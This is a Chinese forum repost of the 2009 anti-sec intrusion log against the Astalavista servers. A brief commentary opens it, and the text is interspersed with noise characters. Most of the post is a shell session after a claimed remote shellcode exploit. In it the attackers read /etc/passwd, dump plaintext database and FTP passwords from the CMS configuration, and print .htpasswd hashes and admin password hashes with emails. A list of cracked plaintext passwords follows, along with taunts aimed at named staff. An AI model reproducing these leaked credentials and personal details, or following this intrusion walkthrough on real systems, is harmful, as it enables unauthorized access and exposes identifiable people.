标题: Astalavista被蹂躏过程 [打印本页] 作者: admin 时间: 2012-11-6 21:07 标题: Astalavista被蹂躏过程 里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。 4 n* ~, N0 C" W1 L 0 F& N$ |, _6 J! M% _[root@front3 ~]# curl -I litespeedtech.com 4 `8 B8 {' |2 {, `+ |( KHTTP/1.1 200 OK! W8 ?: J5 k' W5 B) _0 O& B$ l* y
Date: Fri, 05 Jun 2009 22:54:51 GMT 9 K4 E# o( L' R: U9 qServer: LiteSpeed 4 H9 n1 A% \8 K8 W/ t& w7 q" I: J" X, H9 c5 k
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_- ! v* \) K% H7 \6 i' R5 V- w1 e f8 Y2 V( H0 O' U7 X
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。 " o4 q' T5 R1 b( e, }, q 6 `1 g( z& C2 V' | h, {6 [ W1 j I( l: i/ a5 v, G5 a& e
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ / a7 L, B' w# I7 }' x# r, t
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \0 ? @4 F7 ?' {! B0 [6 U5 N
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \/ j$ N4 M0 y _6 R" t
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /# W5 f1 T# p6 e
\/ \/ \/ \/ \/ \/ \/ & @3 w# Y/ m# @& g+ \* M' p The Hacking & Security Community( r6 i2 [4 z8 W: J) _
[+] Founded in 1997 by a hacker computer enthusiast/ h: g, I+ w ~7 b' w9 K
[-] Exposed in 2009 by anti-sec group 7 X( m) ^( F Z1 y; }& I/ r$ `+ k% K
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:& r s, o. m6 X+ [2 Y' B1 n
>> 03. Who’s behind the site? $ l9 _5 g+ y( J6 S2 S, G7 v, e0 e$ i- l>>/ ], N" R5 g$ _0 q
>> A team of security and IT professionals, and a countless number of contributors from all over the world. \1 \/ g/ N* p: H1 W9 l2 F & }5 p5 Q+ _' ?3 l9 y% F>> 05. Is it true that the site is visited by script-kiddies and warez fans only? " W- q: {1 g& q% i+ ]>>' D% U5 \0 X8 E N
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and/ K4 o- W4 Q" H, z9 U
military institutions. c- T1 S* Z$ ^ ~5 R: J8 C>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.( X2 d4 u/ @( k9 y6 j2 }
+ a2 {' d; s L) ^- S
Why has Astalavista been targeted?! Q9 S7 `0 [) L( g ?* |+ {
* p1 e7 e6 Y* M# d( @" b. }$ UOther than the fact that they are not doing any of this for the “community” but 9 y8 O0 S/ @9 D( `5 e7 ^for the money, they spread exploits for kids, claim to be a security community- P1 Y- l# t Y8 m9 _. x
(with no real sense of security on their own servers), and they charge you $6.66" u3 J' e1 J# E
per months to access a dead forum with a directory filled with public releases o; E* ]* @3 n" f- M
and outdated / broken services. * U9 d' B# E0 {( K4 b G0 E T( f* E0 V' ^0 E' o$ z
We wanted to see how good that “team of security and IT professionals” really is. : R7 ^" Y* v ]) W" D' M f6 d& N7 a' t# V6 ^
Let’s begin.( l: b+ Z/ e$ s
! [# K' f% A) p7 Canti-sec:~# ./g0tshell astalavista.com -p 80+ Q* i: Y) q. n! J1 R4 P
[+] Connecting to astalavista.com:80 ( }9 m# Q3 d+ j[+] Grabbing banner…: R1 ]6 v6 p2 v" Y% P
LiteSpeed 2 s# n. n7 p$ S" E9 \[+] Injecting shellcode… + {1 i; P6 q% k( y$ L+ N4 _1 W[-] Wait for it # ~- {8 M* y" Q( ^/ h# N) I- C) @# y3 r' \$ x2 S
[~] We g0tshell : H- `; |; A0 ?. C+ G' Runame -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux 6 l- V* X+ ^; l6 f) @( jID: uid=100(apache) gid=500(apache) groups=500(apache)9 V+ B) A* e V7 T# Q- H% l2 J7 q0 z3 b
/ T" b1 w2 J( c1 ]4 p$ Ysh-3.2$ cat /etc/passwd $ P) f* r5 j, M* x+ p1 q- hroot:x:0:0:root:/root:/bin/bash2 G% n2 R3 V2 O0 ?2 J
bin:x:1:1:bin:/bin:/sbin/nologin5 g/ P% H; A4 @ @8 t4 q9 j
daemon:x:2:2:daemon:/sbin:/sbin/nologin3 }) ?( a, @/ ?- J! g# e; N
adm:x:3:4:adm:/var/adm:/sbin/nologin6 r2 L/ {- U/ e9 g/ S
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin ' p/ P0 M8 v4 r0 i; x% P/ r1 D9 X. tsync:x:5:0:sync:/sbin:/bin/sync& {' Z* S# z2 h. J) m" y
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown e4 l; `2 l4 M
halt:x:7:0:halt:/sbin:/sbin/halt9 \& Y$ d2 V9 S" x6 C
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ; C3 Q" {- x$ Z _. Cnews:x:9:13:news:/etc/news: 3 F# |8 D' M3 @8 y0 Juucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin " e9 w0 L e( m4 p# E1 woperator:x:11:0perator:/root:/sbin/nologin 4 e$ v. L+ u4 S5 G* egames:x:12:100:games:/usr/games:/sbin/nologin. c# T2 m2 @( H# J$ p
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin 8 A) ]/ a! J; [8 N+ D$ B, Qftp:x:14:50:FTP User:/var/ftp:/sbin/nologin , b) G* f6 h2 ~0 Vnobody:x:99:99:Nobody:/:/sbin/nologin1 D5 m: ^, Y! C+ b
rpm:x:37:37::/var/lib/rpm:/sbin/nologin' Z' W1 s# U8 U9 ~
dbus:x:81:81:System message bus:/:/sbin/nologin5 U! s; o& L: F8 Q# x8 X3 x2 V
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin/ {+ q+ k& p- J. j" w
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin $ p( V9 u" p! k* D, {smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin9 X; K. v, N; D1 {* u
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin' k" R/ d3 ?9 m4 o' g2 T: k
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin v. d I: V, i1 L/ _
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin 5 [8 Q* r; n {7 r) x/ wrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin4 a0 X# {; r# C: z* K# X5 [
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin. E8 y! h. X7 P, p
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin . Y( r6 L4 I- A1 J" G6 Gpcap:x:77:77::/var/arpwatch:/sbin/nologin( V, K/ f/ y9 b7 s) C6 B* \7 D
named:x:25:25:Named:/var/named:/sbin/nologin% l/ C+ l! x! @3 Z4 Q
apache:x:100:500::/var/www:/bin/false 3 Y- r' k7 ~$ j3 _. n% K% kdiradmin:x:101:101::/usr/local/directadmin:/bin/bash 3 }8 L( b* S1 tmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash 9 @: Z4 j1 c3 w6 F% d/ H! `/ Rwebapps:x:500:501::/var/www/html:/bin/bash3 x0 k& z; K0 n5 y; |
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash" x( G5 o' W8 t, x0 d3 |3 J
admin:x:501:502::/home/admin:/bin/bash : R% y* A5 B* C1 x& Zjon:x:502:503::/home/jon:/bin/bash ! X p2 q+ E& c% Qcom:x:503:504::/home/com:/bin/bash5 o: P, F+ }* A: F
ntp:x:38:38::/etc/ntp:/sbin/nologin( e# N* i: k4 A- C
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin 5 G1 T# v6 S5 Pastanet:x:504:505::/home/astanet:/bin/bash; @3 N6 m) }& W3 |/ c
avahi:x:70:70:Avahi daemon:/:/sbin/nologin2 ` c' x$ m2 R ]% h
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin; W) Y, y" x0 i( i
; }" `7 `4 s7 `% o, f `, Msh-3.2$ cat /etc/hosts * W, a' }, c p8 h* h0 x# Do not remove the following line, or various programs L9 I% b& k& T3 {4 ]
# that require network functionality will fail. * F" A+ C1 F2 A/ ?: |3 ^! v+ Q127.0.0.1 localhost.localdomain localhost % J. S7 x F$ J' I& y9 r::1 localhost6.localdomain6 localhost6* J9 i0 r* O. Y: x; j' s8 p) Z2 ]3 c
80.74.154.172 asta1.astalavistaserver.com 7 S8 {0 @' K9 W1 w( Q E5 a, s" {% R5 ~7 V
sh-3.2$ pwd 6 z5 C* V) R4 [7 N3 h) L5 N( c/home/com/public_html i! w0 ^# O4 k# A% M 5 c+ X" P. H( T6 @. m/ @sh-3.2$ ls -la% b7 Z4 h+ g2 m% b
total 18460$ x/ z& @' e' P$ T0 D
drwxr-xr-x 30 com apache 4096 May 28 17:06 . / W7 Z$ h4 M( |* q+ o1 A. bdrwx–x–x 11 com com 4096 Jun 25 2008 ..) u2 [& ` m! ~ L+ t5 l5 u
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin8 A, n! i/ P$ X( ]2 y' e/ b' N7 x
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache' u) \5 l& h7 W% Q5 K& k( x: B
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin ; d( M; c5 Q. u ydrwxrwxrwx 2 com com 4096 May 19 00:50 config 0 L$ J1 ?$ N9 ?* f. adrwxr-xr-x 2 com com 4096 Mar 20 11:05 core 1 H/ Q9 Y/ y# l' q( Y; Odrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules % B0 j7 J. J) x0 x: Mdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing 2 m7 p) M# s, G3 j2 rdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo8 F% `" p) G# B6 ~3 Y
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__ ( _ O% o! \& A7 i1 ~3 {-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php4 Y$ r$ b& p: s3 b( R
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd . K0 ?6 _ }0 Z6 c6 {( b! u' |. Edrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor 8 c5 y* o/ X$ w, S2 x-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico 0 R* y: b/ r B+ H' h' Pdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed ) n0 ] n! j C( z7 E A-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess7 p5 t! Z2 C$ S/ n# j; a6 K
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak $ X U3 |. C. f-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak G5 A. t _' X$ r7 P
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool$ c( v! } y3 T5 v$ ^, |
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images% ?/ W* d/ e7 v3 `, E [6 F
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php7 Q2 J5 N. ^/ }& e% p3 R
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer 5 I2 e; M: ~6 U8 c4 N# wdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang , ^# g' a: U, J7 _drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib1 F* O# ]( U. z% O# B/ A7 `$ C
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media 1 r4 G5 c0 q& O+ ?$ ^# r Z8 Odrwxr-xr-x 8 com com 4096 May 11 12:48 modifications/ {( m7 h" U9 J+ E$ H# w7 x" l5 o
drwxr-xr-x 34 com com 4096 May 28 16:30 modules / d- H4 l$ V) C% Wdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin; M7 H+ R8 C) e0 q/ t5 ^
drwxrwxr-x 22 com com 4096 May 28 17:06 _new 0 P( c2 ^* a0 \) X, ^$ B) ?drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old ' B) R; @. e$ V( ]/ [1 H7 ldrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy" ^. l( J" z' k. [5 r9 B- u
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy 2 X1 g6 }7 K/ a/ a. L-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt $ }" d% F' E* ^% }+ J, l4 I-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml" P/ p/ y A) Y; S
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php# ^% E5 y1 w0 @# m1 S T" ~1 r
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes - L; F! T* `1 p3 A" W' ~. ~ z+ odrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp + p0 V% t% j' m- L! zdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam 3 W2 d7 D7 @; I 8 G/ Q* L, A9 z% Ssh-3.2$ head -20 index.php 4 q7 Z- \, n2 d" q' J9 R6 M<?php( N5 N* X- m% e5 m. }
8 `! y5 m z/ \9 B" K) b/** " @# G% s. z) R- A% i* The main page for the CMS7 J: h4 g& H) p' \; v5 I" V
* @copyright CONTREXX CMS - COMVATION AG& S% b/ j L. L8 P: Z: Y! K8 T* w
* @author Comvation Development Team0 L: v( T8 f3 l% Q9 n
* @version v1.0.9.10.1 stable: j" D! ?. n1 t6 o: T% A
* @package contrexx5 E M& l1 r9 r( S6 }/ V
* @subpackage core6 x" r: m% k" [/ ?& |2 g t, ^
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage2 \! k/ b1 M9 n0 |
* @since v0.0.0.0 - i. [$ R. j+ w; w- C* @todo Capitalize all class names in project ( J) `0 a9 j' b. C* @uses /config/configuration.php 9 r/ p) P- T* j1 ^1 E* @uses /config/settings.php ' A" M; A( i/ y1 C* V: b* @uses /config/version.php 8 W0 [% w# |; K W6 t B" [9 L0 s* @uses /core/API.php , t9 @- E3 g0 i5 F* @uses /core_modules/cache/index.class.php' S1 t- @5 F+ S* B7 v; ~! Y
* @uses /core/error.class.php 8 K( f }0 I, s. q* Q& g1 k* @uses /core_modules/banner/index.class.php ; \8 | g2 b& }! k( Z* @uses /core_modules/contact/index.class.php + D% Z5 _9 b: E7 D+ s% x+ U- w: k% Q+ }( X
sh-3.2$ cd config/- x7 z5 D; o; B. j
sh-3.2$ ls -la/ C5 B4 |% l* m$ a, {6 n
total 329 H) w$ X$ V$ L5 b' o3 L7 ]' @: J$ P( N
drwxrwxrwx 2 com com 4096 May 19 00:50 .' G7 [9 a( L, B. F9 c1 Q7 o
drwxr-xr-x 30 com apache 4096 May 28 17:06 .. ( J( R7 F; Q2 T. v# h% w: e-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php ' y# a* P. h, y' o/ N+ g! s+ y/ M-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php: I x, V) g0 Z/ Q& z9 \8 A
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php# V) S" [% H0 Y! ~0 M8 f; m% j8 M+ r
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php 2 ~: `* ~# W+ l7 W! `/ o8 ~) _, v! {0 `7 h& ^/ R8 _
sh-3.2$ cat configuration.php & V' e" F# W/ Z! }" k# C[snip] 2 F- F; A/ ^* B6 S* d8 z: x$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost ; G p: H/ J5 N3 v+ P# m# Z$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name3 G4 |8 K% H% @! S1 H
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix/ F; C( z/ y& x0 \0 `: ]
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username4 j p0 W- Q6 r; r# K0 a9 {; B
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password& `5 ~; c5 p& _
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..) $ t( I# l3 H; E, e$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..) + ]/ P, E' T4 e1 {[snip]' s S" C1 `/ Q F% `' S
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false 9 l/ X( g/ l8 a9 k: K4 E$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode , Q# T7 h' A1 x2 {( O1 x4 a# f6 F$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost# N, M4 a( L/ \5 j4 x5 j4 p
$_FTPCONFIG['port'] = 21; // Ftp remote port. P* p$ e% R& ~1 c: ^! c& A$ p" W/ I
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username 6 `: r$ d2 E8 K! U7 D3 l) N* C$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password2 v7 s2 b. C4 B" l
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms ' |$ d: b: D* t4 {. V% d 2 f- b% m' U1 t; G0 |3 H) Tsh-3.2$ cd .. , P; t( ?: _0 gsh-3.2$ cd dvd/ 8 [$ A; {6 D- V1 X" Q0 ]! A2 X* \: jsh-3.2$ ls -la5 v% N$ m7 G0 r" s V# Q& ]
total 2913780 ' w. F4 _6 y Y9 [4 idrwxr-xr-x 2 com com 4096 Sep 9 2008 . 3 c- D& |$ k' }6 h5 _7 O: Gdrwxr-xr-x 30 com apache 4096 May 28 17:06 .. ' }& t7 [1 C5 v3 X# x' {4 }% o-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar9 ?( k) J( \9 _) p8 c. Q
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar ; z! t4 l, i3 B o6 d% Q-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar( C9 o: b5 _+ \6 \& W7 _" _
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess5 W9 W) ~! L6 g- `* c3 f. B
5 ^8 W' R! a% O* s, g# H2 H9 O: \8 y2 I
sh-3.2$ cat .htaccess 0 F. D( P6 k# N {) Q' E4 jauthType Basic ( a; j5 V4 c* s( R+ {3 zauthName DVD # A* A2 b* M. ~5 y, b. M% `authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd( h3 a$ Y. Y& W9 Q. S* e& _( Q, l) [" I
require valid-user $ C5 R0 i. t" ~6 I2 d e1 k2 Q3 f% Y2 j' Z
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 g- T2 M: o( w5 V
DVDdownload:CRD8cuY6.MPT6 7 a$ y) v1 T0 P* Z1 a, \/ o4 xDVDdownload2:CR8a36.wluFMg; I2 h" {# K6 D( ], E7 F7 a
: o- u3 M# ]: H: i: }) p% r. Jmysql> select username,password,email from contrexx_access_users where is_admin = 1;, D3 X8 j S+ K# ]: o$ M
+————+———————————-+—————————–+ # I# y6 _# R* r& N; L; v/ x7 F| username | password | email |! o. U$ u" u1 D2 u( z
+————+———————————-+—————————–+ 2 y$ K+ O7 V$ ^/ Q9 f% A| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com | . D; F: l4 g$ i2 x, r* W. J( B| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |# I$ e! W$ R, ]3 y& v
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch | & n; s9 G! p. C( @9 f D| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com | 0 D8 `' _& X" O# |+————+———————————-+—————————–+ " d( m) j# V$ ^4 }$ ?2 M' C* Q2 d4 rows in set (0.04 sec)0 T. _) m5 h9 h/ R+ X0 |+ v
. c; E8 M9 g3 v* E* v
mysql> exit; : }8 [: k, e- FBye/ ?$ z/ }% h( O( p
* t0 s6 I! b' y[~] There you go, your “team of security and IT professionals” is a joke.$ ]3 ?/ J( N) ?- v N6 u
: M4 a) y1 y. s+ G4 v/ r( S) ?" ~# w+——————————+; U( \! [- S3 s
system:f82BN3+_* " l: h* `& x; w# ^ U4 DBe1er0ph0r:belerophor4astacom1 P7 t' p$ O/ _% |+ ]0 C
prozac:asta4cms!; @+ ~- j U% l6 e6 s3 \! B) Q
commander:mpbdaagf6m ) J3 {" U+ E' c$ Q1 {/ k8 Hsykadul:ak29eral " H8 g$ d; z1 K+——————————+5 ^4 o' I- c! I1 w# h: L
! W' L0 b, |6 \: X% f0 o* U. _[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)% o4 H! P T, Y( n9 \# r& j+ r7 O: ?
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it. : d1 N6 X N/ y' F( @2 D1 b5 J% E' d9 W
[~] Lets move to astalavista.net now,- M; _1 K' {3 h7 C7 {7 R5 |
. q0 I. X5 k( y- e8 I; p
From <链接标记[url]https://www.astalavista.net/[/url]>: ! _3 P: t$ S* R5 X3 {>> Everyone knows that the best defense is a good offense.! \( g9 b) Y' F6 C5 Q0 O
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy. + e' v* K' ]! d/ i+ b# O>> The ASTALAVISTA hacking & security community is the largest IT security community in the world. 7 g) \, P* H' P: Z; M$ |& P>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”2 G% i, F* f2 p$ m w1 ]# H2 {/ @% r
# f5 j6 u8 b# m6 ^8 F' ^! z
>> Go ahead, try and hack our server . in a completely legal way! 7 L1 j; J- j, E" O>> Learn by doing: We offer our members tricky tasks and challenges on an + A* I! P6 T$ e7 H& E- S* j% d3 ]>> ongoing basis so you can test your knowledge and abilities. You can also7 G. ?4 x$ W, {" x+ Z+ e. r% e
>> demonstrate what you.ve mastered by taking part in regular hacker contests1 |- M6 y& y: x3 g0 S( l1 S
>> and war games- F7 _+ U+ d% d+ E7 |! i
% T+ X0 Q1 Q5 \8 j2 G
[~] Lets take a look there, after all… they are hack-proof, aren’t they?! 1 ~5 l7 [4 A5 B7 ]4 g0 c% e$ m( c: q3 d( v
[-] Tricky task: Find home dir of astalavista.net3 Q" m+ m( g1 f0 y+ R H; z
" s4 j- K3 l& r; a, W9 J A( L; ksh-3.2$ ls -la ~astanet/ N; ]7 h! [$ t" g, P: _
total 48 5 q* V0 C' n, b) U6 ]2 ^ Xdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 . . U% {$ g" X8 v' p$ Cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..( \6 S' q3 Z! ?
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth' i# j) {, k( N; o7 k% l
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history3 Y7 o X# ]% h
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout 0 W# i% a7 w G3 E( H6 }-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile$ b, i( O }5 A: c* x! k
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc, V5 E% U7 u6 k3 b
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains 4 j: [4 v4 D6 l) i6 ~5 L( Kdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap5 \7 E1 P: {' u- Q3 {
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail$ n5 n9 e0 u" n- Z8 L
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html : P7 `/ R+ m& G+ I* v6 w0 B-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow 8 S4 H6 Z0 {/ L( |! j9 y- e/ O( }0 ]' Y' G# z0 W1 I/ }
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/ 4 r) \% l& A- A# B0 Wsh-3.2$ ls -la. o# |: g5 |3 k# j
total 200 ! z g2 ?$ {/ d& X5 l1 @% Bdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 . 0 e, ?! D/ e, ?drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 .. : E3 x/ G8 U5 G' I6 adrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0074 u4 g1 u; y$ v' `
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql 1 c. }" s* h) h% qdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com5 M# P& f* i4 C# I" X9 |* s! D" g
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend& Y$ b! [: N& R8 V
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner, D; s" [7 J- s$ G, m
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg # O4 V' m0 {+ Q+ i B: K8 Ndrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config5 C& r* n5 H: X3 j/ X: R5 H9 L2 g3 U
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron& U- L& s& j) H
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd # e2 U; A9 g/ {6 C2 f; ]-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php, V6 Y* w Q( C. Z' |
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico1 ^+ ?0 ~# @1 G+ k* f) V% z
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed + b' B& S6 n* B0 k2 m3 z8 Adrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour 3 j$ G# W6 Y$ Y. P+ d-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess& g# G) E3 u/ R; l" U" F6 q
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess$ z+ q; p4 R6 s6 `$ _
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php' z" `1 b, M" k& Q7 {
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html % N# z0 x$ I+ M8 c, r g-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php 8 ?7 ?& @. a( V2 O# b% I2 g-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php 8 e1 {8 M' ~" G( S8 B-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf2 F+ Z' Z& ?, ^; y: w
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc ' P7 s q7 ~( N- X1 e* |, }2 \drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang* b3 d- D M. o5 U/ M
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib. z( D0 n: W) v( D
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log % w$ u* J( W* f6 G: wdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member: Q {0 ~2 ^; @! ]. h5 {- p9 d
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata, c) `+ B# ^9 D
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new ~2 w$ T+ X1 `. z
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf 5 h! U. b* @4 c3 m( t5 U' sdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re/ F% o7 Q8 {( j
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt, p6 G% M' y7 v6 ?6 A7 ^9 L
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss/ X' a6 S( y# x
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources 0 f' b- B( s, A! V1 ^drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com . V# _! ]* }9 j/ S1 [2 b5 j) Ldrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes6 b- A6 j9 R% ]" K6 q! J
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src; p4 f( c# X2 r* @! V
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl5 K+ d& E, Y" b6 F! ~4 J* x0 Y; P+ |+ u
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2, {5 {7 |, e9 l( |5 _7 Z. u V) E
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old 3 }1 [( c: e0 Y5 J) g" O-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php8 J& [; k5 P: n" ]; L- Y3 Q
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki 1 E& m2 P- Q) n) k9 g+ ~. r9 q ~( n1 J% |! c5 Z# p4 v% Gsh-3.2$ head -20 index.php ) \2 L# w% j0 g. ]; I<?PHP& H, z$ C2 j5 A* b! d+ }" u
